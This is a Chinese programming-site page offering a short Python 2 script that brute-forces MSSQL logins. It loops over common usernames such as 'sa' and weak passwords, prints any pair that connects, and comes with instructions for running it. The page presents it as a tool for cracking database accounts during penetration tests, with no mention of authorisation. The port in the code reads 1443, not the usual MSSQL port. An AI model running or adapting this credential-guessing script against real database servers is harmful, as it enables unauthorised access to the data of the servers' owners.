当前位置:Gxlcms > mssql > Python版Mssql爆破小脚本

Python版Mssql爆破小脚本

时间:2021-07-01 10:21:17 帮助过:73人阅读

Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解

import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密码字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典

success = False
host = "127.0.0.1"#数据库IP地址
port = 1443
for username in mssql_username:
  for password in common_weak_password:
    try:
      db = pymssql.connect(server=host, port=port, user=username, password=password)
      success = True
      if success:
        print username, password
    except Exception, e:
      pass

说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

您可能感兴趣的文章:

  • Python连接mssql数据库编码问题解决方法
  • Python基于Pymssql模块实现连接SQL Server数据库的方法详解
  • 如何处理Python3.4 使用pymssql 乱码问题
  • Python3连接SQLServer、Oracle、MySql的方法
  • Python实现读取SQLServer数据并插入到MongoDB数据库的方法示例
  • Python操作Sql Server 2008数据库的方法详解
  • Python3操作SQL Server数据库(实例讲解)
  • python访问sqlserver示例
  • python连接sql server乱码的解决方法
  • Python实现的连接mssql数据库操作示例

人气教程排行